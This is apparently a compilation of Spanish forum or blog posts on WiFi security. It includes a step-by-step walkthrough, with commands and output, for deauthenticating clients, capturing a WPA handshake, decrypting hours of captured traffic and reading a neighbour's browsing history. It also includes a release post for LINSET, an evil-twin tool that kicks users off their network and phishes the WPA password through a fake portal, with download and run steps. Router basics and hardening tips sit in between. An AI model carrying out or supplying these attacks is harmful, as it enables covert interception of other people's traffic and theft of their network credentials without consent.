Mostrando entradas con la etiqueta Wireless. Mostrar todas las entradas

Capturando el tráfico de una red WiFi como un ninja


Una de las cosas que más nos debería preocupar cuando tenemos a un intruso en nuestra red de confianza (Red local de casa, del trabajo, etc.) es que capture el tráfico y lo analice, de forma que pueda controlar lo que estamos haciendo.

Una vez invadida una red WiFi podríamos intentar capturar tráfico con tcpdump, pero no tendríamos los resultados esperados. Una buena forma de hacerlo sería redirigir todo el tráfico de la red a nuestro equipo para poder analizarlo, pero ésto podría disparar varias alarmas.

The quieter you become, the more you are able to hear
El lema de BackTrack es lo que nos trae a buscar procedimientos más silenciosos, así que... ¿Cómo podemos capturar el tráfico de la red sin llamar la atención?

La respuesta es, como siempre: DEPENDE

Muchos hackers dan una respuesta muy tajante con respecto a la seguridad y el WiFi: No lo uses, usa cable. Pero ¿por qué son tan tajantes?



Algunos se amparan en la lógica de la velocidad de red. Está muy bien que con las redes WiFi N alcances 150Mbps, o que los 450Mbps con wifi a 5GHz, pero sigue siendo menos que la mitad que las redes Gigabit. Coherente, lógico y correcto. En eso es mejor el cable que el WiFi. ¿Pero qué más?

Seguridad. Utilizar WiFi es jugar con fuego bajo determinadas circunstancias, ya que el tráfico de la red se puede capturar sin estar conectado a la red (Cualquiera que sepa levantar claves WEP habrá capturado muchísimo tráfico antes de conocer la contraseña)

Una vez sabida la contraseña podríamos intentar descifrar todo el tráfico capturado para su posterior análisis en Ethereal. Pero en las redes WPA no es tan sencillo. Es muy fácil, pero no tanto.

¿Cómo se crackea una clave WPA?

No lo voy a explicar aquí en detalle, éso debéis estudiarlo en otros posts. Necesitamos llegar aquí sabiendo que necesitamos capturar el handshake de un cliente autenticado para hacerle un ataque por diccionario, hasta que el archivo se descifra correctamente y obtenemos el positivo.

Por esa regla de tres podemos deducir que si tenemos el handshake y la contraseña podemos descifrar los paquetes capturados para analizarlos después. Y para eso no necesitamos estar conectados a la red, sólo tener nuestra antena WiFi a la escucha.

El otro día estuve jugando con ataques de fuerza bruta contra WPS con un resultado fructífero. Usaré ese AP a modo de dummy. (Nota: Los posibles datos identificativos han sido editados)

Código: Text
  1. root@kali:/home/rand0m/neighbor# airodump-ng -w ahorateveo --bssid D8:61:FF:FF:FF:FF --essid VodafoneFFFF --channel  7 --output-format pcap -a wlan0mon

Lanzamos airodump-ng con los parámetros bssid y essid para filtrar sólo el tráfico de la red que nos interesa. Además le decimos que nos guarde el archivo ahorateveo en formato pcap.

Código: Text
  1.  CH  7 ][ Elapsed: 0 s ][ 2015-08-18 22:07
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe

De primeras tenemos nuestra antena a la escucha y filtrando los paquetes de la red que queremos. Ahora necesitamos el handshake, así que lanzamos el ataque DEAUTH con aireplay-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# aireplay-ng -0 0 -a D8:61:FF:FF:FF:FF wlan0mon
  2. 22:10:30  Waiting for beacon frame (BSSID: D8:61:FF:FF:FF:FF) on channel 7
  3. NB: this attack is more effective when targeting
  4. a connected wireless client (-c <client's mac>).
  5. 22:10:31  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  6. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  7. 22:10:32  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  8. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  9. 22:10:33  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  10. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  11. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  12. 22:10:34  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  13. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]
  14. 22:10:35  Sending DeAuth to broadcast -- BSSID: [D8:61:FF:FF:FF:FF]

Hasta que conseguimos lo que queríamos: El WPA handshake.

Código: Text
  1.  CH  7 ][ Elapsed: 5 mins ][ 2015-08-18 22:12 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -81 100       40        0    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -74    1e- 6      0     4019  VodafoneFFFF

Ahora lo dejamos a la escucha y nos olvidamos. Vamos a dejarlo capturando unas horas y luego veremos qué nos encontramos.

Cuando tenemos un buen pino ya podemos ponernos a estudiar los datos recopilados.

Código: Text
  1.  CH  7 ] 9 hours 55 mins ][ 2015-08-19 08:02 ][ WPA handshake: D8:61:FF:FF:FF:FF
  2.  
  3.  BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
  4.  
  5.  D8:61:FF:FF:FF:FF  -82  96   298434    99355    0   7  54e  WPA  CCMP   PSK  VodafoneFFFF
  6.  
  7.  BSSID              STATION            PWR   Rate    Lost    Frames  Probe
  8.  
  9.  D8:61:FF:FF:FF:FF  18:83:FF:FF:FF:FF  -75    1e- 6      0     1365  VodafoneFFFF

Ahora, para descifrarlo, usaremos la herramienta airdecap-ng, que viene con la suite de aircrack-ng.

Código: Text
  1. root@kali:/home/rand0m/neighbor# airdecap-ng -e VodafoneFFFF -b D8:61:FF:FF:FF:FF -p Underc0de ahorateveo-01.cap
  2. Total number of packets read       2532614
  3. Total number of WEP data packets         0
  4. Total number of WPA data packets     93405
  5. Number of plaintext data packets         0
  6. Number of decrypted WEP  packets         0
  7. Number of corrupted WEP  packets         0
  8. Number of decrypted WPA  packets     79414

Esto nos generará el archivo ahorateveo-01-dec.cap con los paquetes descifrados. Ya sólo nos queda abrirlo en Wireshark para poder analizar los datos recopilados.

Por ejemplo, viendo las consultas DNS realizadas podemos ver por dónde estuvo navegando.


Y podemos ver que es un chico malo malo que navega por piratebay y por páginas golfas. Lo típico que hace alguien relajándose mientras no hay nadie mirando, pero ¿cuántas veces creemos que no nos observan mientras sí lo hacen?

Además, como hablábamos al principio, los paquetes se capturaron del aire. No estoy conectado a la red, sólo conozco la contraseña.

NO aparezco conectado a su red. NO aparezco enviando tráfico sospechoso. Sólo escucho, descifro y analizo.

Autor: rand0m
Fuente: https://underc0de.org/foro/wireless/capturando-el-trafico-de-una-red-wifi-como-un-ninja

Seguridad en redes Wireless

 
 
Seguridad Wireless
 
La seguridad en redes wireless es un tema importante a tener en cuenta, pues son muchas las personas que dejan por defecto las configuraciones de fábrica y son fácilmente crackeables. "Pues la naturaleza de las redes wireless hace que cualquier persona pueda tener acceso a los datos que son enviados, debido a que estos utilizan como medio de transmisión el aire (ondas electromagnéticas). Esto plantea un problema añadido con respecto al cable. Para tener acceso a los datos transmitidos por cable se ha de tener acceso al mismo o a los dispositivos asociados. Para las redes wireless no es necesario, basta con que la señal viaje hasta nosotros." (información entre comillas de securitybydefault) si alguien se conectara a tu red podría: capturar tus credenciales de sitios web, espiar tu navegación, etc...

Medidas de prevención
 
1- Cambiar el ESSID de la red(El nombre por defecto, ejemplo:"ONO2A4S")
2- Cambiar la clave por defecto por una más segura combinando: mayúsculas, minúsculas, números y símbolos.
3- Deshabilitar el procolo WPS (Wi-Fi Protected Setup)
4- Usar cifrados WPA2 en vez de WEP o WPA.
5- Cuando estés fuera de casa sino lo necesitas apagar el router.
 
Se da por hecho que hoy en día estés usando cifrado WPA/2 en tu red Wireless, ahora el punto que podría definir debilidad o fortaleza en tu red es tu contraseña/clave, para ayudarte a elegir la más apropiada usaremos el sitio web de kurtm.net, el cual nos permite generar una contraseña con una longitud de caracteres personalizado o podemos elegir los 3 niveles que ofrece.


Falsa Seguridad [8 caracteres]

Seguridad Media

Seguridad Maxima

Numero de  caracteres personalizado, en este caso 42

Cabe aclarar que depende del modem o router utilizado admite hasta cierto número de caracteres, ahora si son paranoicos pueden personalizar la contraseña que el sitio web les ofrece, así será única y difícilmente será crackeable.

Airdriver-ng

Airdriver-ng es un script que provee información  acerca de los drivers inalámbricos en su sistema y la habilidad a cargar y descargar  los drivers. Adicionalmente, airdriver-ng le permite instalar y desinstalar los drivers  con los parches que son requeridos  para los modos de monitor y de la inyección. Entre otras funciones


Syntaxis
Airdriver-ng     (modelodedriver)

Comandos 

Supported                   Lista de todos los drivers que son soportados
Kernel                        Listar todos los drivers que estan kernel
Installed                     Mostrar todos los drivers instalados
Loaded                       Lista de drivers cargados
load                            Cargar driver
unload                        Descargar driver
reload                         Recargar driver
install                          Instalar driver driver
remove                       Remover  driver
remove stack             Removes a stack   
install stack               Instalar stack
details                        Mostrar detalles de drivers
detect                         Detectar las tarjetas de wireless

Este comando detectara las tarjetas de red que esten conectadas a nuestro OS

airdriver-ng detect



Airdriver-ng supported



Post realizado por Aika


Conceptos basicos de Routers en Windows


Escribo este pequeño texto a fin de solucionar las dudas corrientes que suelen tener muchas personas relativas al tema de los routers

Este hilo trata de los aparatos que realizan la función de router. No voy a tocar para nada el tema de enrutado

Qué es un router
Un router es aquel ordenador o aparato que conecta dos redes a fin de que puedan enviarse datos entre sí.
Corrientemente tienen dos usos: conectarse a internet (al fin y al cabo internet es otra red) o bien conectar dos redes de una misma empresa a fin de poder compartir información, recursos, etc.

¿Como funciona
Tienen dos modos de funcionar. En monopuesto y en multipuesto.
En monopuesto un router solamente hace de bridge (no enruta). En este modo se pierden la mayor parte de las prestaciones de un router. Prácticamente convertimos nuestro router en un modem. A la hora de compartir esta conexión será necesario un proxy en el ordenador al que esté conectado, porque no se podrá compartir directamente.
En multipuesto se utiliza el router a sus máximas prestaciones. El router guarda una serie de tablas internas que le permiten saber lo que pide cada cual. El router sale al exterior con una única ip llamada ip pública (que es la que va a todas partes y la única que se ve desde el exterior).  Cuando obtiene un resultado mira en su tabla y ve quien solicitó ese resultado y se lo envía.

¿Como se conecta un router?
Un router se conecta siempre a un switch/hub con un cable cruzado. En este caso no hay ningún driver ni software ni nada que instalar en ningún ordenador. Solo se configura el tcp/ip poniendo como puerta de enlace la ip local del router. Un router no se instala. Se enchufa.

Los routers domésticos llevan incluído un hub. En este caso (el normal en casos domésticos), en vez de un cable cruzado se emplea un cable normal porque en realidad no nos enchufamos al router, sino al hub y este ya está diréctamente conectado al router.

Si el router está configurado como monopuesto entonces ya no hablamos de un router. Hablamos de un modem y estará conectado directamente al puerto usb o serie de un ordenador.

Debo tener ip dinámica/estática
El caso del usuario normal con un pc en casa y que no pretende dar servicios de red al exterior le basta con una ip dinámica. Esto es que al conectar el router se autentifica contra un servidor del isp y este al darle acceso le da una ip que utilizará para moverse en internet.
El caso del usuario (empresa) que quiere proporcionar servicios internet, disponer de un dominio, etc. debe utilizar una ip estática. En este caso el router ya tiene prefijada esa ip y no debe conectar/desconectar cada vez.

¿Debo configurarlo?
Vienen ya con una configuración de fábrica. Si se trata de conectar un ordenador o dos quizá se acaba antes si se miran las instrucciones del router y se ve en que ip está puesto. Con poner los ordenadores en la misma subred y poner puerta de enlace la ip del router será suficiente.

Los casos mas comunes para cambiar la configuración de un router son:
a) Quieres abrir o cerrar puertos de acceso.
b) Quieres establecer algunas reglas de filtrado.
c) Quieres cambiar la contraseña de acceso a la configuración
d) Vas a poner algún servicio de red en tu red que será accesible desde el exterior (p. ej. un servidor web o ftp)
e) Te han facilitado un nombre de usuario y contraseña para acceder y te han dicho que lo pongas en la configuración del router.

En estos casos debes acceder a la configuración del router. Hay varios métodos para hacerlo:
a) Desde una ip local accede por http. Para ello harás http://ip_del_router y se solicitará contraseña de acceso. Al ponerla se accede a una página web donde se pueden modificar todos los parámetros del router.
b) Desde una ip local accede por telnet. Para ello harás telnet://ip_del_router y se solicitará contraseña de acceso. Al ponerla se accede a una shell donde se pueden modificar todos los parámetros del router.
c) Mediante hiperterminal
Para ello tendrás que tener conectado el router a un ordenador por el puerto serie. En este caso debes abrir una sesión en hiperterminal y acceder por ella al router. En este caso no es necesaria contraseña. Se accede directamente.
d) Mediante una aplicación que viene con el router
En este caso tendrás que mirar la documentación del router, pero lo general es que haya que acceder por el puerto local o usb.

Debo poner un firewall en mi vida?
No si tienes bien configurado el router puesto que las reglas de filtrado hacen en la práctica de firewall. Solo tienes que tener debidamente actualizado el firmware de tu router para evitar bugs, tener las reglas de acceso en condiciones y tener una contraseña de acceso a la configuración que no sea estandar.

¿Qué pasa si se me olvida la contraseña?
Casi todos los router llevan un botón de reset que pone al router en la configuración de fábrica. Si no tiene ese botón tendrás que acceder por hiperterminal y cambiarla.

¿Qué tipo de cosas debo cambiar en un router?
No tienes porque cambiar nada, pero las necesidades básicas para alguien que no sea un experto se solucionan configurando las opciones de NAT y las reglas de filtrado.

He cambiado la configuración pero no ha funcionado
La configuración de un router se guarda en memoria eprom y persiste aunque lo desenchufes. Si la cambias debes utilizar la opción de reiniciar el router.

¿Por qué se me ha bloqueado el router?
Si has puesto una configuración no válida se puede bloquear. También es frecuente que ocurra al abrir puertos. Si se da el caso solo puedes reiniciarlo.

Qué es NAT
Es un protocolo que sirve para trasladar una solicitud de servicio de una ip a otra y viceversa.
Modificando la configuración de NAT podrás abrir un puerto y darle un sentido. Por ejemplo una regla de NAT puede ser:
'cuando llegue una petición desde el exterior dirigida al puerto 21 envía esa petición al ordenador que tiene la ip X.X.X.X" que es el ordenador que tiene montado un servidor ftp.

¿Qué es el filtrado?
Las reglas de filtrado son reglas para seguridad del router. Equivalen a un firewall. Depende del modelo de router puede haber mas o menos posibilidad de hacer reglas, pero por lo general se pueden hacer reglas por ip, por protocolo o por paquete. Así por ejemplo podrías hacer una regla en la que no estuviera permitido utilizar pop3 y smtp por ejemplo
Las reglas de ip son mas corrientes. Suelen estar puestas de forma que no se pueda acceder a la configuración del router desde una ip que no sea local. Con estas reglas se puede poner algo como "impedir que se pueda acceder desde el exterior a cualquier servicio de red" o bien "permitir que la ip X.X.X.X pueda acceder a la configuración".

¿Como hago para poner mi nombre y contraseña?
Junto a tu nombre y contraseña te han dicho el protocolo de autentificación y de seguridad que usarás. Corrientemente será PPoE o PPoA con chat o pap.

Simplemente sigue sus instrucciones y pon los datos tal y como te digan (considerando mayúsculas y minúsculas).

¿Como configuro mi router con hiperterminal?
a)Conectas el router al puerto serie que quieras (yo hablaré de COM1).
b)Inicias una nueva sesión de hiperterminal con el nombre que quieras, pero poniendo 'directo a COM1"
Al darle conectar debería salir el menú de configuración junto con una bienvenida.
Si no sale nada, comprueba que tienes puesto COM1 con paridad 8N1 y velocidad 9600 sin flujo de datos. También que en hiperterminal tienes puesto el echo (si te salen las cosas dos veces quítalo).

¿Y para configurarlo en linux?
Da igual en que quieras usarlo. Un router es un recurso de red y te conectas a él a través de tcp/ip. Sea windows, sea linux, sea solaris, ... tienes que poner la puerta de enlace tcp/ip la ip local del router.


LINSET 0.14 - WPA/2 Hacking sin Fuerza Bruta


Bueno, antes de nada, presentar la herramienta. Para los que no la sepan, es una herramienta de ingeniería social, basada en el MITM para comprobar la seguridad (o ignorancia) de los clientes de nuestra red. Los pasos que realiza son:

FUNCIONAMIENTO

1. Escanea la red.
2. Selecciona la red.
3. Busca handshake (se puede usar sin handshake)
4. Se elige una de las varias interfaces web adaptadas por mi (gracias a la colaboración de los users)
5. Se monta un FakeAP imitando al original
6. Se crea un servidor DHCP sobre el FakeAP
7. Se crea un servidor DNS para redirigir todas las peticiones al Host
8. Se lanza el servidor web con la interface seleccionada
9. Se lanza el mecanismo para comprobar la validez de las contraseñas que se van a introducir
10. Se desautentifica a todos los usarios de la red, esperando que se conecten al FakeAP e introduzcan la contraseña.
11. Se detiene el ataque tras la comprobación correcta de la contraseña

Para probar su funcionamiento, es necesario que tengais instaladas diversas dependencias, las cuales LINSET comprobará y indicará si están instaladas o no.

También es preferible que tengais el patch para el canal negativo, ya que si no es así, tendréis complicaciones para poder relizar el ataque de forma correcta

MEJORAS

Dejo unos apartados sobre cosas que he visto y que me gustaría ir resolviendo poco a poco para las proximas versiones... :

-Solucionar bucle infinito de la web cuando se entra a través de una subURL muy rara. [Solucionado]
-Implementar redireccionamiento en lighttpd que no provoque ese bucle
-La carga de la web por primera vez se hace muy lenta aveces (probado solo desde movil) [Solucionado]
-Mejorar el sistema encargado de gestionar la comprobacion del handshake [Solucionado]
-Titulo al script...  [Solucionado]
-Interfaz mas bonita al script....  Grin [Solucionado]
-Colores y dialogos...  Grin [Solucionado]
-Interface neutral basado en popup de jquerry [Solucionado]
-Comprobacion de Handshake en segundo plano

CHANGELOG

  1. ########## 06-11-2013 LINSET 0.1
  2. ##
  3. ## #Fecha de Salida
  4. ##
  5. ########## 07-11-2013 LINSET 0.1b
  6. ##
  7. ## #Cambiado el Fakeweb a Inglés
  8. ## #Añadida funcion para quitar el modo monitor al salir
  9. ## #Arreglado Bucle para no colapsar la pantalla con información
  10. ## #Colocada opción de seleccionar otra red
  11. ## #Eliminado mensaje sobrante de iwconfig
  12. ##
  13. ########## 10-11-2013 LINSET 0.2
  14. ##
  15. ## #Añadido Changelog
  16. ## #Reestructurado el codigo
  17. ## #Cambiada la posición de ventanas xterm
  18. ## #Eliminada creacion extra del archivo route
  19. ## #Movido pantalla de comprobacion de handshake a una ventana xterm
  20. ## #Añadido menu durante el ataque
  21. ## #Añadida comprobacion de dependencias
  22. ##
  23. ########## 22-11-2013 LINSET 0.3
  24. ##
  25. ## #Arreglado mensaje de Handshake (no se mostraba bien)
  26. ## #Añadida interface de routers Telefonica y Jazztel (Xavi y Zyxel)
  27. ## #Fix cuando se usaba canales especificos (exit inesperado)
  28. ## #Mejorado DEBUG (function_clear y HOLD)
  29. ## #Migración de airbase-ng a hostapd
  30. ## #Reestructurado mas codigo
  31. ## #Añadido header
  32. ## #Añadida funcion para eliminar interfaces en modo monitor sobrantes
  33. ##
  34. ########## 30-11-2013 LINSET 0.4
  35. ##
  36. ## #Agregado soporte a airbase-ng junto a hostapd
  37. ## #Capacidad para comprobar pass sin handshake (modo Airlin"
  38. ## #Arregladas problemas con variables
  39. ## #Fix espacio Channel
  40. ## #Eliminada seleccion con multiples tarjetas de red
  41. ## #Arreglado error sintactico HTML de las interfaces Xavi
  42. ## #Implementada interface Zyxel (de routers de Telefonica también)
  43. ##
  44. ########## 07-12-2013 LINSET 0.5
  45. ##
  46. ## #Arreglado bug que impide usar mas de una interface
  47. ## #Migración de iwconfig a airmon-ng
  48. ## #Añadida interface HomeStation (Telefonica)
  49. ## #Arregladas llamadas PHP a error2.html inexistente
  50. ## #Arreglado bug que entraba en seleccion de Objetivos sin que se haya creado el CSV correspondiente
  51. ## #Opcion Salir en el menu de seleccion de webinterfaces
  52. ## #Arreglado bug que entraba en seleccion de Clientes sin que los haya
  53. ## #Arreglado bug que entraba en seleccion de Canal sin que haya interface valida seleccionada
  54. ##
  55. ########## 11-12-2013 LINSET 0.6
  56. ##
  57. ## #Bug al realizar deauth especifico sin que haya airodump en marcha
  58. ## #Modificadas variables que gestionan los CSV
  59. ## #Modificada estetica a la hora de seleccionar objetivo
  60. ## #Añadidos colores a los menus
  61. ## #Modificado funcionamiento interno de seleccion de opciones
  62. ## #Arreglado bug de variables en la comprobacion de dependencias
  63. ## #Añadida dependencia para ser root
  64. ##
  65. ########## 15-12-2013 LINSET 0.7
  66. ##
  67. ## #Añadido intro
  68. ## #Mejoradas variables de colores
  69. ## #Añadida interface de los routers Compal Broadband Networks (ONOXXXX)
  70. ## #Mejorada la gestion de la variable de Host_ENC
  71. ## #Arreglado bug que entraba en modo de FakeAP elegiendo una opcion inexistente
  72. ## #Modificado nombre de HomeStation a ADB Broadband (según su MAC)
  73. ## #Agregada licencia GPL v3
  74. ##
  75. ########## 27-12-2013 LINSET 0.8
  76. ##
  77. ## #Modificada comprobación de permisos para mostrar todo antes de salir
  78. ## #Añadida funcion para matar software que use el puerto 80
  79. ## #Agregado dhcpd a los requisitos
  80. ## #Cambiado titulo de dependecia de PHP (php5-cgi)
  81. ## #Modificado parametro deauth para PC's sin el kernel parcheado
  82. ## #Añadida funcion para matar software que use el puerto 53
  83. ## #Funcion para remontar los drivers por si se estaba usando la interface wireless
  84. ## #Modificada pantalla que comprueba el handshake (mas info) y mejoradas las variables
  85. ## #Mejorado menu de comprobacion de password con mas información
  86. ## #Añadida lista de clientes que se muestran en el menu de comprobacion de password
  87. ## #Cambiado ruta de guardado de password al $HOME
  88. ## #Reestructuracion completa del codigo para mejor compresion/busqueda
  89. ## #El intro no aparecerá si estas en modo desarrollador
  90. ## #No se cerrará el escaneo cuando se compruebe el handshake
  91. #
  92. ## #Agregada funcion faltante a la 0.8 inicial (me lo comi sin querer)
  93. ##
  94. ########## 03-01-2014 LINSET 0.9
  95. ##
  96. ## #Funcion de limpieza si se cierra el script inesperadamente
  97. ## #Mejorada funcion de deteccion del driver
  98. ## #Modificadas variables que almacenaban las interfaces con nombres "wlan" y 'mon' para dar mas soporte a otros sistemass
  99. ## #La carpeta de trabajo se crea mas temprano para evitar posibles problemas
  100. ## #Añadida funcion para comprobar la ultima revision de LINSET
  101. ## #Autoactualizacion del script si detecta una version mas nueva de si mismo
  102. ## #Backup del script tras la actualizacion por si surgen problemas
  103. ## #Fix Menu de tipo de Desautentificacion (no se ve lo que se escribe)
  104. ## #Eliminada funcion handshakecheck del background
  105. ## #Eliminado mensaje de clientes.txt (problema devido a handcheck)
  106. ## #Bug que no mostraba correctamente los clientes conectados
  107. ##
  108. ########## 19-01-2014 LINSET 0.10
  109. ##
  110. ## #Agregado curl a las dependencias
  111. ## #Bug que no mostraba bien la lista de los clientes
  112. ## #Eliminado cuadrado en movimiento por cada sleep que se hacia en la ventana de comprobacion de handshake
  113. ## #Mejorada la comunicacion entre PHP y checkhandshake (ya no funciona por tiempos)
  114. ## #Cambiada ruta de trabajo de LINSET por defecto
  115. ## #Bug wpa_passphrase y wpa_supplicant no se cerraban tras concluir el ataque
  116. ## #Suprimidas de forma indefinida todas las interfaces web hasta ahora por motivos de copyright
  117. ## #Integrada interface web neutra basada en JQM
  118. ##
  119. ########## 29-01-2014 LINSET 0.11
  120. ##
  121. ## #Mejorada la comprobacion de actualizaciones (punto de partida desde la version del script actual)
  122. ## #Modificada url de comprobacion
  123. ## #Bug mensaje de root privilegies (seguia con el proceso)
  124. ## #Modificado orden de inicio (primero comprueba las dependencias)
  125. ## #Mejorada interface web
  126. ## #Agregada dependencia unzip
  127. ## #Bug al seleccionar una interface que no existe
  128. ## #Fix variable $privacy
  129. ## #Modificaciones leves de interface web
  130. ## #Adaptada interface para multiples idiomas
  131. ## #Añadido idioma Español
  132. ## #Añadido idioma Italiano
  133. ##
  134. ########## 18-02-2014 LINSET 0.12
  135. ##
  136. ## #Tarjetas con chipset 8187 pasaran dietctamente al menu de airbase-ng
  137. ## #Mensaje javascript adaptado según el idioma
  138. ## #Fix variable revision del backup
  139. ## #Bug en busqueda infinita de actualizaciones
  140. ## #Añadida restauracion de tput a la limpieza del script
  141. ## #Cerrar aplicaciones por medio del PID para evitar problemas
  142. ## #Añadido mdk3 a dependencias
  143. ## #Añadida desautenticacion por mdk3 al AP
  144. ## #Organizacion de codigo
  145. ## #Mejorada la busqueda de actualizaciones (casi directa)
  146. ## #Cambiada ruta de guardado del backup
  147. ##
  148. ########## 21-03-2014 LINSET 0.13
  149. ##
  150. ## #Ampliado tiempo de espera antes de detener el atque
  151. ## #Corregido bug al hacer backup
  152. ## #Añadido reinicio de NetworkManager para Wifislax 4.8
  153. ## #Desautentificacion masiva se hace exclusivamente con mdk3
  154. ## #Fallo al reiniciar networkmanager cuando acaba el ataque
  155. ## #Fix cuando se autocierra linset despues de acabar el ataque
  156. ## #Añadido pyrit a dependecias
  157. ## #Funcion de comprobacion estricta del handshake
  158. ## #Eliminadas dependencias inecesarias
  159. ## #Mayor desplazamiento por los menus
  160. ## #Añadido lenguaje Frances
  161. ## #Añadido lenguaje Portugues
  162. ##
  163. ########## 16-06-2014 LINSET 0.14
  164. ##
  165. ## #Info del estado del handshake en captura
  166. ## #Redirigido .cap para evitar salida de error de pyrit
  167. ## #Capacidad para usar handshake ya capturado previamente
  168. ## #Reconfiguradas liberias de jQuerry
  169. ## #Arreglado bug de URL's complejas
  170. ## #Desautentificar masivamente a varios MAC con igual ESSID
  171. ## #Manipaular .cap complejos para usar el handshake del objetivo
  172. ## #Invertido menu de comprobacion de handshake
  173. ##
  174. ##########

Bueno, sin mas palabrerias, les dejo el link

Última modificacion: 16-06-2014

DESCARGA


USO

Para usarlo, le damos permisos con:

chmod +x linset

y ejecutamos:

./linset


FAQ
  • Donde está el módulo XZM?

    Desde la versión 4.8 de Wifislax, Linset ya viene incluido en la distribución. Por tanto, solo es necesario ir al menú y usar la herramienta.

    Puedo usar Linset en otras distribuciones?

    Si. Linset está pensado para adaptarse a distintas distribuciones. El único inconveniente es que tendrás que instalar todas las herramientas que utiliza, pero en principio no hay ningún problema

    Por que la pagina web de linset me sale en sin color y da fallos?

    Este fallo es debido a la mala configuración de lighttpd cuando se lanza el ataque y que todavía no he encontrado solución. Cuando abres una URL compleja, surge un problema en las redirecciones a las ubicaciones de los archivos que están definidos en el HTML, con lo que no llega a encontrar. Por eso se aprecia en blanco y negro, porque no “encuentra” donde están las librerías de jQuerry Mobile. En casos extremos, tampoco vé al php que maneja los formularios y causa problemas en el envío y la recepción de la contraseña.


    Cuando abro una web desde el movil no me redirige a la pagina de linset.

    Eso es debido a que están activados los datos del movil. Si no se desactivan los datos, las páginas se obtendrán de internet, y no de Linset

    Que dispositivos móviles son compatibles?

    Todos los dispositivos son compatibles, aunque los últimos iOS de los iPhone dan algunos problemas (según los usuarios)

    Puedo cambiar la pagina web por otra mas creible?

    Linset no dará soporte a la importación de otras páginas webs que contengan copyright. Eso no quiere decir que no se puede hacer, pero se mantendrá la que hay actualmente.

    Cuando se crea el AP falso, la MAC no es exactamente igual... por qué?

    Si se clona la MAC por completo, los dispositivos que intenten conectarse no sabrán distinguir las distintas wifis, por lo que es inviable hacer esto.

    Tengo un adaptador USB y me da problemas... por qué?

    Hasta el momento, el único chipset que dá problemas es el 8187, pues no son compatibles con Hostapd. En vez de eso, se usará Airbase-ng, que tiene peor rendimiento (en velocidad de datos), pero sirve.

    Puedo usar mi propio handshake en vez de capturar uno?

    Si puedes, pero por ahora linset no incluye esa funcionalidad. Puedes hacerlo manualmente cuando Linset está en el menú de captura de handshake sustituyendo el handshake que se genera en /tmp/TMPLinset por el tuyo (ojo, tienen que tener el mismo nombre), y continuando con el proceso.